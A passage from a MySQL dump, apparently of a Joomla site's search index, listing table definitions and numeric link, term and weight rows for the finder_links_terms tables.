(288, 313344, 0.98),
(288, 313345, 1.09669),
(288, 313346, 1.07331),
(288, 313347, 0.98),
(288, 313348, 0.88669),
(288, 313349, 0.98),
(288, 313350, 0.28),
(288, 313351, 0.93331),
(288, 313352, 1.09669),
(288, 313353, 0.95669),
(288, 313354, 1.05),
(288, 313355, 0.91),
(288, 313356, 1.00331),
(288, 313357, 1.07331),
(288, 313358, 0.91),
(288, 313359, 1.00331),
(288, 313904, 0.88669),
(288, 313905, 1.00331),
(288, 313906, 0.37331),
(288, 313907, 1.14331),
(288, 313908, 1.37669),
(290, 315378, 0.88669),
(290, 315379, 1.02669),
(290, 315380, 1.63338),
(290, 315381, 1.86662),
(290, 315382, 0.91),
(290, 315383, 1.07331),
(290, 315384, 1.07331),
(290, 315385, 1.14331),
(290, 315386, 0.86331),
(290, 315387, 0.93331),
(290, 315388, 0.93331),
(290, 315389, 1.00331),
(290, 315390, 0.88669),
(290, 315391, 0.98),
(290, 315392, 0.32669),
(290, 315393, 1.07331),
(290, 315394, 1.16669),
(290, 315395, 0.95669),
(290, 315396, 1.05),
(290, 315397, 1.05),
(290, 315398, 1.16669),
(290, 315399, 0.93331),
(290, 315400, 0.95669),
(290, 315401, 0.95669),
(290, 315402, 0.86331),
(290, 315403, 0.93331),
(290, 315404, 0.95669),
(290, 315803, 0.95669),
(290, 315804, 1.05),
(290, 315805, 0.81669),
(290, 315806, 0.93331),
(290, 315807, 0.81669),
(290, 315808, 0.93331),
(292, 317418, 0.93331),
(292, 317419, 1.96),
(292, 317420, 0.93331),
(292, 317421, 1.02669),
(292, 317422, 0.86331),
(292, 317423, 1.00331),
(292, 317424, 1.05),
(292, 317425, 1.05),
(292, 317426, 1.14331),
(292, 317427, 1.12),
(292, 317428, 1.09669),
(292, 317429, 1.00331),
(292, 317430, 1.09669),
(292, 317431, 0.95669),
(292, 317432, 1.00331),
(292, 317433, 0.88669),
(292, 317434, 1.09669),
(292, 317435, 0.95669),
(292, 317436, 1.05),
(292, 317437, 0.88669),
(292, 317438, 0.98),
(292, 317439, 1.02669),
(292, 317440, 0.42),
(292, 317441, 0.98),
(292, 317442, 1.07331),
(292, 317443, 0.28),
(292, 317444, 0.91),
(292, 317445, 1.02669),
(292, 317446, 1.09669),
(292, 317447, 1.16669),
(292, 317448, 0.95669),
(292, 317449, 0.93331),
(292, 318086, 0.86331),
(292, 318087, 0.98),
(292, 318088, 0.37331),
(292, 318089, 0.95669),
(292, 318090, 1.19),
(294, 318437, 3.41312),
(294, 318438, 10.4531),
(294, 318439, 1.28331),
(294, 318466, 8.96),
(294, 318467, 10.4531),
(295, 318574, 0.98),
(295, 318575, 0.84),
(295, 318576, 1.05),
(295, 318577, 1.12),
(295, 318578, 1.21331),
(295, 318579, 0.14),
(295, 318580, 0.88669),
(295, 318581, 1.05),
(295, 318822, 0.23331),
(295, 318823, 0.91),
(295, 318824, 1.05),
(295, 318825, 0.0175),
(295, 318826, 0.86331),
(295, 318827, 1.09669),
(298, 320059, 1.12),
(308, 320059, 1.12),
(298, 320060, 1.05),
(308, 320060, 1.05),
(298, 320061, 1.16669),
(308, 320061, 1.16669),
(298, 320062, 1.07331),
(308, 320062, 1.07331),
(298, 320063, 1.02669),
(308, 320063, 1.02669),
(298, 320064, 1.00331),
(308, 320064, 1.00331),
(298, 320065, 1.07331),
(308, 320065, 1.07331),
(298, 320066, 0.32669),
(308, 320066, 0.32669),
(298, 320067, 0.93331),
(308, 320067, 0.93331),
(298, 320068, 1.16669),
(308, 320068, 1.16669),
(298, 320069, 0.93331),
(308, 320069, 0.93331),
(298, 320070, 1.02669),
(308, 320070, 1.02669),
(298, 320071, 0.23331),
(308, 320071, 0.23331),
(298, 320072, 0.91),
(308, 320072, 0.91),
(298, 320073, 0.98),
(308, 320073, 0.98),
(298, 320074, 0.88669),
(308, 320074, 0.88669),
(298, 320075, 1.02669),
(308, 320075, 1.02669),
(298, 320076, 0.95669),
(308, 320076, 0.95669),
(298, 320077, 1.14331),
(308, 320077, 1.14331),
(299, 320722, 0.88669),
(299, 320723, 1.00331),
(299, 320724, 0.98),
(299, 320725, 1.02669),
(299, 320726, 1.26),
(299, 320727, 0.95669),
(299, 320728, 0.98),
(299, 320729, 1.07331),
(299, 320730, 1.02669),
(299, 320731, 0.98),
(299, 320732, 1.05),
(299, 320733, 2.14662),
(299, 320734, 1.02669),
(299, 320735, 0.98),
(299, 320736, 1.05),
(299, 320737, 0.93331),
(299, 320738, 1.09669),
(299, 320739, 1.02669),
(299, 320740, 1.14331),
(299, 320741, 0.91),
(299, 320742, 1.00331),
(299, 320743, 0.91),
(299, 320744, 1.09669),
(299, 320745, 1.02669),
(299, 320746, 1.07331),
(299, 320747, 0.95669),
(299, 320748, 1.12),
(299, 320749, 0.98),
(299, 320750, 1.07331),
(299, 320751, 0.98),
(299, 320752, 1.05),
(299, 320753, 1.05),
(299, 320754, 0.42),
(299, 320755, 1.02669),
(299, 320756, 1.35331),
(299, 320757, 1.09669),
(299, 320758, 1.23669),
(299, 320759, 0.88669),
(299, 320760, 0.95669),
(299, 320761, 1.07331),
(299, 320762, 1.02669),
(299, 320763, 1.00331),
(299, 320764, 1.09669),
(299, 320765, 0.91),
(299, 320766, 1.02669),
(299, 320767, 0.93331),
(299, 320768, 0.98),
(299, 320769, 1.09669),
(299, 320770, 1.12),
(299, 320771, 0.88669),
(299, 320772, 1.00331),
(299, 320773, 0.18669),
(299, 320774, 0.86331),
(299, 320775, 0.95669),
(299, 320776, 0.91),
(299, 320777, 1.02669),
(299, 320778, 0.95669),
(299, 320779, 1.02669),
(299, 320780, 0.88669),
(299, 320781, 0.95669),
(304, 323912, 1.05),
(305, 323912, 1.05),
(304, 323934, 0.93331),
(305, 323934, 0.93331),
(304, 323935, 1.02669),
(305, 323935, 1.02669),
(304, 324909, 0.86331),
(304, 324910, 0.95669),
(304, 324911, 0.32669),
(304, 324912, 0.95669),
(304, 324913, 1.07331),
(304, 324914, 0.95669),
(304, 324915, 1.05),
(304, 324916, 0.88669),
(304, 324917, 0.98),
(304, 324918, 0.93331),
(304, 324919, 1.09669),
(304, 324920, 0.98),
(306, 324920, 0.98),
(304, 324921, 1.05),
(304, 324922, 1.02669),
(304, 324923, 1.21331),
(304, 324924, 0.98),
(304, 324925, 1.02669),
(304, 324926, 1.09669),
(304, 324927, 1.21331),
(304, 324928, 1.02669),
(304, 324929, 1.02669),
(304, 324930, 0.98),
(304, 324931, 1.09669),
(304, 324932, 1.02669),
(304, 324933, 0.95669),
(304, 324934, 1.07331),
(304, 324935, 0.98),
(305, 325952, 1.00331),
(305, 325953, 1.05),
(305, 325954, 1.00331),
(305, 325955, 0.98),
(305, 325956, 1.09669),
(305, 325957, 0.86331),
(305, 325958, 0.91),
(305, 325959, 1.00331),
(305, 325960, 1.14331),
(305, 325961, 0.37331),
(305, 325962, 0.98),
(305, 325963, 1.05),
(305, 325964, 0.46669),
(305, 325965, 1.02669),
(305, 325966, 1.30669),
(305, 325967, 0.98),
(305, 325968, 1.23669),
(305, 325969, 0.46669),
(305, 325970, 1.26),
(305, 325971, 1.4),
(305, 325972, 0.91),
(305, 325973, 0.98),
(305, 325974, 1.16669),
(305, 325975, 1.26),
(305, 325976, 0.93331),
(305, 325977, 1.12),
(305, 325978, 0.93331),
(305, 325979, 1.02669),
(305, 325980, 0.88669),
(305, 325981, 0.95669),
(305, 325982, 0.91),
(305, 325983, 1.16669),
(305, 325984, 0.88669),
(305, 325985, 0.98),
(305, 326709, 0.37331),
(305, 326710, 0.95669),
(305, 326711, 1.05),
(306, 327051, 0.37331),
(306, 327052, 1.00331),
(306, 327053, 1.07331),
(306, 327054, 0.98),
(306, 327055, 1.14331),
(306, 327056, 1.09669),
(306, 327057, 0.93331),
(306, 327058, 0.93331),
(306, 327059, 1.02669),
(306, 327060, 1.00331),
(306, 327061, 1.12),
(306, 327062, 1.12),
(306, 327063, 0.98),
(306, 327064, 1.12),
(306, 327065, 0.51331),
(306, 327066, 1.19),
(306, 327067, 1.30669),
(306, 327068, 1.09669),
(306, 327069, 1.16669),
(306, 327070, 1.09669),
(306, 327071, 0.98),
(306, 327072, 1.05),
(306, 327073, 1.07331),
(306, 327074, 0.37331),
(306, 327075, 1.07331),
(306, 327076, 1.12),
(306, 327077, 1.00331),
(306, 327078, 1.09669),
(306, 327079, 0.88669),
(306, 327080, 1.07331),
(306, 327081, 0.86331),
(306, 327082, 0.98),
(306, 327083, 1.05),
(306, 327084, 1.05),
(306, 327085, 0.28),
(306, 327086, 0.93331),
(306, 327087, 1.02669),
(306, 327088, 0.88669),
(306, 327089, 0.98),
(306, 327090, 0.28),
(306, 327091, 0.91),
(306, 327092, 1.00331),
(306, 327093, 0.32669),
(306, 327094, 0.93331),
(306, 327095, 1.02669),
(306, 327096, 0.98),
(306, 327097, 1.05),
(306, 327098, 1.07331),
(306, 327099, 0.95669),
(306, 327100, 1.09669),
(306, 327101, 0.95669),
(306, 327102, 1.02669),
(306, 327103, 1.02669),
(306, 327104, 1.21331),
(306, 327105, 0.86331),
(306, 327106, 0.91),
(306, 327107, 1.02669),
(306, 327108, 1.12),
(306, 327109, 1.09669),
(306, 327110, 0.88669),
(306, 327111, 1.05),
(306, 327112, 0.86331),
(306, 327113, 0.95669),
(306, 327114, 0.95669),
(306, 327115, 1.07331),
(306, 327116, 1.02662),
(306, 327117, 1.02669),
(306, 327118, 1.07331),
(306, 327119, 1.02669),
(306, 327120, 1.21331),
(306, 327121, 0.91),
(306, 327122, 1.05),
(306, 327123, 0.95669),
(306, 327124, 1.12),
(306, 327125, 0.91),
(306, 327126, 1.05),
(306, 327127, 0.91),
(306, 327128, 0.93331),
(306, 327129, 0.91),
(306, 327130, 0.95669),
(306, 327131, 1.07331),
(306, 327132, 0.14),
(306, 327133, 0.88669),
(306, 327134, 0.98),
(306, 328400, 0.93331),
(306, 328401, 1.02669),
(306, 328402, 1.21331),
(306, 328403, 0.95669),
(306, 328404, 1.09669);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_termsa`
--

CREATE TABLE `y57u5_finder_links_termsa` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_termsa`
--

INSERT INTO `y57u5_finder_links_termsa` (`link_id`, `term_id`, `weight`) VALUES
(193, 11539, 0.07),
(233, 11539, 0.07),
(237, 11539, 0.07),
(240, 11539, 0.07),
(247, 11539, 0.07),
(249, 11539, 0.07),
(255, 11539, 0.07),
(258, 11539, 0.07),
(264, 11539, 0.07),
(287, 11539, 0.07),
(295, 11539, 0.07),
(306, 11539, 0.07),
(44, 11539, 0.14),
(168, 11539, 0.14),
(238, 11539, 0.14),
(243, 11539, 0.14),
(273, 11539, 0.14),
(304, 11539, 0.14),
(305, 11539, 0.14),
(236, 11539, 0.21),
(242, 11539, 0.21),
(262, 11539, 0.21),
(178, 11539, 0.35),
(31, 11539, 0.37),
(31, 11540, 2.8666),
(31, 11541, 3.2666),
(44, 25911, 1.58662),
(44, 25912, 1.77338),
(235, 50669, 0.14),
(243, 50669, 0.14),
(267, 50669, 0.74),
(178, 77371, 0.77),
(236, 77371, 0.77),
(273, 77371, 0.77),
(178, 77375, 0.79331),
(236, 77375, 0.79331),
(236, 77377, 0.21),
(238, 77377, 0.21),
(258, 77377, 0.21),
(258, 163056, 0.84),
(262, 163056, 0.84),
(273, 168187, 0.77),
(242, 168187, 1.54),
(161, 189308, 0.21),
(161, 189309, 0.91),
(161, 189310, 1.02669),
(168, 197579, 0.86331),
(168, 197580, 0.91),
(168, 197581, 0.86331),
(168, 197582, 0.95669),
(178, 210942, 0.14),
(263, 210942, 0.14),
(268, 210942, 0.74),
(174, 214916, 0.28),
(270, 214916, 0.74),
(174, 214917, 1.58662),
(174, 214918, 1.72662),
(174, 214919, 0.14),
(294, 214919, 0.14),
(272, 214919, 0.74),
(174, 214920, 0.81669),
(294, 214920, 0.81669),
(174, 214921, 0.91),
(178, 221166, 0.88669),
(178, 221167, 0.88669),
(178, 221168, 0.86331),
(178, 221169, 0.93331),
(178, 221170, 0.77),
(178, 221171, 0.84),
(178, 221172, 0.81669),
(178, 221173, 0.88669),
(178, 221174, 0.23331),
(178, 221175, 0.88669),
(178, 221176, 1.09669),
(178, 221177, 0.86331),
(178, 221178, 0.93331),
(178, 221179, 0.09331),
(178, 221180, 0.95669),
(178, 221181, 1.09669),
(263, 227195, 0.14),
(265, 227195, 0.74),
(247, 228815, 0.14),
(248, 228815, 0.74),
(193, 238106, 0.81669),
(193, 238107, 0.91),
(273, 256069, 0.81669),
(273, 256070, 0.88669),
(233, 266350, 0.79331),
(233, 266351, 0.88669),
(233, 266352, 0.35),
(235, 267372, 0.88669),
(235, 267373, 0.95669),
(236, 268484, 1.00331),
(236, 268485, 0.86331),
(236, 268486, 0.91),
(236, 268487, 0.91),
(236, 268488, 0.91),
(236, 268489, 1.05),
(237, 269397, 0.81669),
(237, 269398, 1.02669),
(238, 270498, 0.86331),
(238, 270499, 0.93331),
(238, 270500, 0.93331),
(238, 270501, 1.05),
(238, 270502, 0.88669),
(238, 270503, 1.00331),
(238, 270504, 0.35),
(238, 270505, 0.93331),
(238, 270506, 1.00331),
(240, 274540, 0.88669),
(240, 274541, 0.95669),
(242, 277603, 0.91),
(242, 277604, 0.88669),
(242, 277605, 0.81669),
(242, 277606, 0.95669),
(242, 277607, 0.35),
(242, 277608, 0.95669),
(242, 277609, 1.07331),
(243, 281713, 0.81669),
(243, 281714, 0.88669),
(243, 281715, 0.81669),
(243, 281716, 0.95669),
(243, 281717, 0.79331),
(243, 281718, 0.98),
(243, 281719, 0.35),
(243, 281720, 0.91),
(243, 281721, 1.19),
(247, 286375, 0.79331),
(247, 286376, 0.93331),
(247, 286377, 0.21),
(247, 286378, 0.81669),
(247, 286379, 0.88669),
(247, 286380, 0.88669),
(247, 286381, 1.02669),
(248, 287329, 2.7334),
(248, 287330, 2.9334),
(249, 288356, 0.81669),
(249, 288357, 0.91),
(249, 288358, 0.74),
(249, 288359, 2.6666),
(251, 289405, 0.21),
(251, 289406, 0.93331),
(251, 289407, 1.09669),
(255, 292614, 0.86331),
(255, 292615, 0.93331),
(258, 295172, 0.95669),
(258, 295173, 0.88669),
(258, 295174, 0.98),
(262, 297293, 0.77),
(262, 297294, 0.88669),
(262, 297295, 0.95669),
(262, 297296, 0.91),
(262, 297297, 1.12),
(263, 299338, 0.81669),
(263, 299339, 0.91),
(263, 299340, 0.84),
(263, 299341, 1.12),
(264, 300361, 0.79331),
(264, 300362, 0.88669),
(265, 300844, 2.4666),
(265, 300845, 2.7334),
(290, 300851, 0.14),
(266, 300851, 0.74),
(266, 300852, 2.4666),
(266, 300853, 2.7334),
(267, 300874, 2.4666),
(267, 300875, 2.7334),
(268, 301893, 2.4666),
(268, 301894, 2.7334),
(294, 302912, 0.14),
(269, 302912, 0.74),
(269, 302913, 2.4666),
(269, 302914, 2.7334),
(270, 303927, 2.4666),
(270, 303928, 2.7334),
(272, 303943, 2.4666),
(272, 303944, 2.7334),
(287, 312750, 0.95669),
(287, 312751, 1.02669),
(290, 315290, 0.81669),
(290, 315291, 0.88669),
(294, 318428, 0.91),
(294, 318429, 0.98),
(294, 318430, 0.91),
(295, 318517, 0.91),
(295, 318518, 1.07331),
(301, 322733, 0.74),
(301, 322734, 2.4666),
(301, 322735, 2.7334),
(304, 324807, 0.84),
(304, 324808, 1.07331),
(304, 324809, 0.84),
(304, 324810, 1.12),
(305, 325834, 0.79331),
(305, 325835, 0.91),
(305, 325836, 0.79331),
(305, 325837, 0.88669),
(306, 326811, 0.79331),
(306, 326812, 0.88669);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_termsb`
--

CREATE TABLE `y57u5_finder_links_termsb` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_termsb`
--

INSERT INTO `y57u5_finder_links_termsb` (`link_id`, `term_id`, `weight`) VALUES
(301, 204, 0.01169),
(304, 204, 0.01169),
(305, 204, 0.03507),
(31, 204, 0.09331),
(159, 204, 0.09331),
(160, 204, 0.09331),
(178, 204, 0.09331),
(242, 204, 0.09331),
(244, 204, 0.09331),
(245, 204, 0.09331),
(246, 204, 0.09331),
(250, 204, 0.09331),
(251, 204, 0.09331),
(253, 204, 0.09331),
(255, 204, 0.09331),
(257, 204, 0.09331),
(259, 204, 0.09331),
(260, 204, 0.09331),
(263, 204, 0.09331),
(264, 204, 0.09331),
(265, 204, 0.09331),
(266, 204, 0.09331),
(267, 204, 0.09331),
(268, 204, 0.09331),
(270, 204, 0.09331),
(272, 204, 0.09331),
(273, 204, 0.09331),
(274, 204, 0.09331),
(280, 204, 0.09331),
(306, 204, 0.09331),
(237, 204, 0.18662),
(238, 204, 0.18662),
(240, 204, 0.18662),
(254, 204, 0.18662),
(256, 204, 0.18662),
(261, 204, 0.18662),
(262, 204, 0.18662),
(275, 204, 0.18662),
(174, 204, 0.27993),
(258, 204, 0.27993),
(288, 204, 0.27993),
(292, 204, 0.37324),
(241, 204, 0.65317),
(31, 205, 0.91),
(159, 205, 0.91),
(160, 205, 0.91),
(250, 205, 0.91),
(251, 205, 0.91),
(31, 206, 1.07331),
(159, 206, 1.07331),
(160, 206, 1.07331),
(250, 206, 1.07331),
(251, 206, 1.07331),
(298, 1436, 0.0175),
(304, 1436, 0.0175),
(161, 1436, 0.14),
(241, 1436, 0.14),
(243, 1436, 0.14),
(245, 1436, 0.14),
(246, 1436, 0.14),
(253, 1436, 0.14),
(258, 1436, 0.14),
(259, 1436, 0.14),
(260, 1436, 0.14),
(265, 1436, 0.14),
(266, 1436, 0.14),
(308, 1436, 0.14),
(193, 1436, 0.28),
(233, 1436, 0.28),
(240, 1436, 0.28),
(255, 1436, 0.28),
(263, 1436, 0.28),
(267, 1436, 0.28),
(268, 1436, 0.28),
(288, 1436, 0.28),
(174, 1436, 0.42),
(257, 1436, 0.42),
(306, 1436, 0.42),
(254, 1436, 0.7),
(264, 1436, 0.7),
(236, 12839, 0.28),
(239, 12839, 0.28),
(241, 12839, 0.28),
(252, 12839, 0.28),
(274, 12839, 0.28),
(288, 12839, 0.28),
(304, 12839, 0.28),
(306, 12839, 0.28),
(272, 12842, 0.14),
(295, 12842, 0.14),
(235, 12842, 0.28),
(253, 12842, 0.28),
(256, 12842, 0.28),
(305, 12842, 0.28),
(233, 12842, 0.42),
(248, 12842, 0.42),
(268, 12842, 0.42),
(174, 12842, 0.56),
(246, 12842, 0.56),
(270, 12842, 0.56),
(273, 12842, 0.56),
(301, 12842, 0.56),
(259, 12842, 0.7),
(260, 12842, 0.7),
(264, 12842, 0.84),
(304, 12842, 0.84),
(240, 12842, 0.98),
(258, 12842, 0.98),
(263, 12842, 0.98),
(269, 12842, 0.98),
(178, 12842, 1.12),
(236, 12842, 1.12),
(239, 12842, 1.12),
(247, 12842, 1.12),
(254, 12842, 1.12),
(299, 12842, 1.12),
(257, 12842, 1.26),
(261, 12842, 1.26),
(262, 12842, 1.26),
(298, 12842, 1.26),
(308, 12842, 1.26),
(238, 12842, 1.4),
(275, 12842, 1.4),
(241, 12842, 1.54),
(237, 12842, 1.68),
(244, 12842, 1.68),
(267, 12842, 1.68),
(255, 12842, 1.82),
(265, 12842, 1.82),
(266, 12842, 1.82),
(168, 12842, 1.96),
(252, 12842, 1.96),
(292, 12842, 1.96),
(243, 12842, 2.1),
(249, 12842, 2.16),
(193, 12842, 2.66),
(274, 12842, 2.96),
(288, 12842, 3.14),
(290, 12842, 4.5),
(306, 12842, 4.9),
(242, 12842, 5.74),
(168, 12849, 0.86331),
(174, 12849, 0.86331),
(193, 12849, 0.86331),
(235, 12849, 0.86331),
(243, 12849, 0.86331),
(244, 12849, 0.86331),
(249, 12849, 0.86331),
(252, 12849, 0.86331),
(253, 12849, 0.86331),
(254, 12849, 0.86331),
(256, 12849, 0.86331),
(257, 12849, 0.86331),
(259, 12849, 0.86331),
(260, 12849, 0.86331),
(263, 12849, 0.86331),
(267, 12849, 0.86331),
(269, 12849, 0.86331),
(274, 12849, 0.86331),
(290, 12849, 0.86331),
(306, 12849, 0.86331),
(240, 12849, 1.72662),
(242, 12849, 1.72662),
(264, 12849, 1.72662),
(270, 12849, 1.72662),
(292, 12849, 1.72662),
(301, 12849, 1.72662),
(265, 12849, 2.58993),
(266, 12849, 2.58993),
(255, 12849, 4.31655),
(252, 12850, 1.02669),
(270, 12850, 1.02669),
(292, 12850, 1.02669),
(301, 12850, 1.02669),
(168, 12851, 0.84),
(178, 12851, 0.84),
(239, 12851, 0.84),
(252, 12851, 0.84),
(257, 12851, 0.84),
(262, 12851, 0.84),
(268, 12851, 0.84),
(275, 12851, 0.84),
(288, 12851, 0.84),
(242, 12851, 1.68),
(274, 12851, 1.68),
(252, 12852, 0.93331),
(274, 12852, 0.93331),
(168, 12853, 0.84),
(233, 12853, 0.84),
(237, 12853, 0.84),
(258, 12853, 0.84),
(267, 12853, 0.84),
(298, 12853, 0.84),
(308, 12853, 0.84),
(238, 12853, 1.68),
(252, 12853, 1.68),
(255, 12853, 1.68),
(262, 12853, 1.68),
(265, 12853, 1.68),
(266, 12853, 1.68),
(269, 12853, 1.68),
(290, 12853, 1.68),
(241, 12853, 2.52),
(243, 12853, 2.52),
(304, 12853, 2.52),
(242, 12853, 3.36),
(292, 12853, 4.2),
(306, 12853, 5.04),
(274, 12853, 8.52),
(239, 12862, 0.98),
(252, 12862, 0.98),
(243, 12866, 0.86331),
(249, 12866, 0.86331),
(252, 12866, 0.86331),
(265, 12866, 0.86331),
(266, 12866, 0.86331),
(288, 12866, 0.86331),
(193, 12866, 1.72662),
(242, 12866, 2.58993),
(239, 12868, 0.84),
(249, 12868, 0.84),
(252, 12868, 0.84),
(255, 12868, 0.84),
(270, 12868, 0.84),
(290, 12868, 0.84),
(298, 12868, 0.84),
(301, 12868, 0.84),
(308, 12868, 0.84),
(168, 12868, 5.04),
(168, 12869, 0.91),
(252, 12869, 0.91),
(178, 12870, 0.28),
(252, 12870, 0.28),
(233, 21011, 0.32669),
(287, 21011, 0.32669),
(298, 21011, 0.32669),
(308, 21011, 0.32669),
(239, 21018, 0.23331),
(262, 21018, 0.23331),
(267, 21018, 0.23331),
(304, 21018, 0.23331),
(268, 21018, 0.46662),
(305, 21018, 0.46662),
(233, 21018, 3.9996),
(239, 21019, 1.00331),
(233, 21019, 13.1864),
(193, 21037, 0.23331),
(233, 21037, 0.23331),
(236, 21037, 0.23331),
(239, 21037, 0.23331),
(243, 21037, 0.23331),
(256, 21037, 0.23331),
(257, 21037, 0.23331),
(259, 21037, 0.23331),
(260, 21037, 0.23331),
(265, 21037, 0.23331),
(266, 21037, 0.23331),
(272, 21037, 0.23331),
(280, 21037, 0.23331),
(241, 21037, 0.46662),
(269, 21037, 0.46662),
(237, 21037, 0.69993),
(304, 21037, 0.69993),
(306, 21037, 0.93324),
(233, 21038, 0.88669),
(243, 21038, 0.88669),
(241, 21038, 1.77338),
(269, 21038, 1.77338),
(304, 21038, 1.77338),
(306, 21038, 2.66007),
(235, 23354, 0.18669),
(237, 23354, 0.18669),
(242, 23354, 0.18669),
(254, 23354, 0.18669),
(299, 23354, 0.18669),
(306, 23354, 0.18669),
(174, 23359, 0.18669),
(240, 23359, 0.18669),
(242, 23359, 0.18669),
(243, 23359, 0.18669),
(262, 23359, 0.18669),
(265, 23359, 0.18669),
(266, 23359, 0.18669),
(268, 23359, 0.18669),
(270, 23359, 0.18669),
(292, 23359, 0.18669),
(299, 23359, 0.18669),
(301, 23359, 0.18669),
(238, 23359, 0.37338),
(241, 23359, 0.37338),
(253, 23359, 0.37338),
(306, 23359, 0.37338),
(193, 23359, 0.74676),
(261, 23359, 0.74676),
(254, 23359, 0.93345),
(168, 23362, 0.23331),
(238, 23362, 0.23331),
(240, 23362, 0.23331),
(241, 23362, 0.23331),
(243, 23362, 0.23331),
(246, 23362, 0.23331),
(249, 23362, 0.23331),
(292, 23362, 0.23331),
(178, 23362, 0.46662),
(235, 23362, 0.46662),
(299, 23362, 0.46662),
(242, 23362, 0.69993),
(256, 23362, 2.09979),
(178, 23363, 0.88669),
(238, 23363, 0.88669),
(243, 23363, 0.88669),
(299, 23363, 0.88669),
(235, 23369, 0.86331),
(240, 23369, 0.86331),
(241, 23369, 0.86331),
(246, 23369, 0.86331),
(263, 23369, 0.86331),
(269, 23369, 0.86331),
(288, 23369, 0.86331),
(306, 23369, 0.86331),
(168, 23369, 1.72662),
(239, 23369, 1.72662),
(247, 23369, 1.72662),
(265, 23369, 1.72662),
(266, 23369, 1.72662),
(242, 23369, 2.58993),
(243, 23369, 2.58993),
(275, 23369, 2.58993),
(299, 23369, 3.45324),
(239, 23373, 0.95669),
(243, 23373, 0.95669),
(288, 23373, 0.95669),
(299, 23373, 0.95669),
(244, 23374, 0.88669),
(299, 23374, 0.88669),
(178, 23380, 0.23331),
(236, 23380, 0.23331),
(237, 23380, 0.23331),
(238, 23380, 0.23331),
(239, 23380, 0.23331),
(241, 23380, 0.23331),
(245, 23380, 0.23331),
(247, 23380, 0.23331),
(253, 23380, 0.23331),
(254, 23380, 0.23331),
(259, 23380, 0.23331),
(260, 23380, 0.23331),
(261, 23380, 0.23331),
(267, 23380, 0.23331),
(273, 23380, 0.23331),
(274, 23380, 0.23331),
(275, 23380, 0.23331),
(288, 23380, 0.23331),
(299, 23380, 0.23331),
(304, 23380, 0.23331),
(305, 23380, 0.23331),
(306, 23380, 0.23331),
(174, 23380, 0.46662),
(246, 23380, 0.46662),
(249, 23380, 0.46662),
(255, 23380, 0.46662),
(257, 23380, 0.46662),
(268, 23380, 0.46662),
(272, 23380, 0.46662),
(280, 23380, 0.46662),
(292, 23380, 0.46662),
(240, 23380, 0.69993),
(244, 23380, 0.69993),
(263, 23380, 0.69993),
(264, 23380, 0.69993),
(265, 23380, 0.69993),
(266, 23380, 0.69993),
(269, 23380, 0.69993),
(193, 23380, 0.93324),
(243, 23380, 0.93324),
(270, 23380, 0.93324),
(301, 23380, 0.93324),
(242, 23380, 1.16655),
(248, 23380, 1.16655),
(258, 23380, 1.16655),
(262, 23380, 1.39986),
(240, 23381, 0.95669),
(299, 23381, 0.95669),
(242, 23381, 1.91338),
(168, 23386, 0.18669),
(299, 23386, 0.37338),
(178, 23391, 0.18669),
(239, 23391, 0.18669),
(240, 23391, 0.18669),
(244, 23391, 0.18669),
(304, 23391, 0.18669),
(168, 23391, 0.37338),
(247, 23391, 0.37338),
(272, 23391, 0.37338),
(280, 23391, 0.37338),
(174, 23391, 0.56007),
(236, 23391, 0.74676),
(269, 23391, 0.74676),
(299, 23391, 0.93345),
(275, 23391, 1.70688),
(239, 23396, 0.91),
(299, 23396, 0.91),
(236, 23400, 0.93331),
(299, 23400, 0.93331),
(243, 23402, 0.28),
(269, 23402, 0.28),
(304, 23402, 0.28),
(239, 23402, 0.56),
(299, 23402, 0.56),
(240, 23402, 0.84),
(244, 23402, 0.96),
(174, 25098, 0.84),
(267, 25098, 0.84),
(298, 25098, 0.84),
(304, 25098, 0.84),
(308, 25098, 0.84),
(306, 25098, 1.68),
(174, 25100, 0.18669),
(249, 25100, 0.18669),
(308, 25100, 0.18669),
(249, 25112, 1.00331),
(298, 25112, 1.00331),
(308, 25112, 1.00331),
(193, 25115, 0.88669),
(237, 25115, 0.88669),
(254, 25115, 0.88669),
(257, 25115, 0.88669),
(261, 25115, 0.88669),
(298, 25115, 0.88669),
(308, 25115, 0.88669),
(168, 25115, 1.77338),
(241, 25115, 1.77338),
(255, 25115, 1.77338),
(274, 25115, 1.77338),
(306, 25115, 2.66007),
(174, 25119, 0.18669),
(253, 25119, 0.18669),
(263, 25119, 0.18669),
(265, 25119, 0.18669),
(266, 25119, 0.18669),
(298, 25119, 0.18669),
(305, 25119, 0.18669),
(306, 25119, 0.18669),
(308, 25119, 0.18669),
(259, 25119, 0.37338),
(260, 25119, 0.37338),
(263, 25120, 0.86331),
(265, 25120, 0.86331),
(266, 25120, 0.86331),
(298, 25120, 0.86331),
(305, 25120, 0.86331),
(308, 25120, 0.86331),
(193, 28388, 0.28),
(239, 28388, 0.28),
(240, 28388, 0.28),
(253, 28388, 2.24),
(238, 31920, 0.88669),
(241, 31920, 0.88669),
(292, 31920, 0.88669),
(193, 31920, 1.77338),
(254, 31920, 3.54676),
(193, 31922, 0.98),
(254, 31922, 1.96),
(243, 36552, 0.86331),
(253, 36552, 0.86331),
(235, 36554, 0.37331),
(236, 36554, 0.37331),
(253, 36554, 0.37331),
(242, 36554, 0.74662),
(174, 36557, 0.84),
(237, 36557, 0.84),
(241, 36557, 0.84),
(253, 36557, 0.84),
(254, 36557, 0.84),
(255, 36557, 0.84),
(256, 36557, 0.84),
(257, 36557, 0.84),
(258, 36557, 0.84),
(259, 36557, 0.84),
(260, 36557, 0.84),
(262, 36557, 0.84),
(263, 36557, 0.84),
(264, 36557, 0.84),
(265, 36557, 0.84),
(266, 36557, 0.84),
(267, 36557, 0.84),
(268, 36557, 0.84),
(270, 36557, 0.84),
(272, 36557, 0.84),
(273, 36557, 0.84),
(274, 36557, 0.84),
(275, 36557, 0.84),
(280, 36557, 0.84),
(288, 36557, 0.84),
(292, 36557, 0.84),
(301, 36557, 0.84),
(304, 36557, 0.84),
(305, 36557, 0.84),
(261, 36557, 1.68),
(237, 36558, 0.93331),
(241, 36558, 0.93331),
(253, 36558, 0.93331),
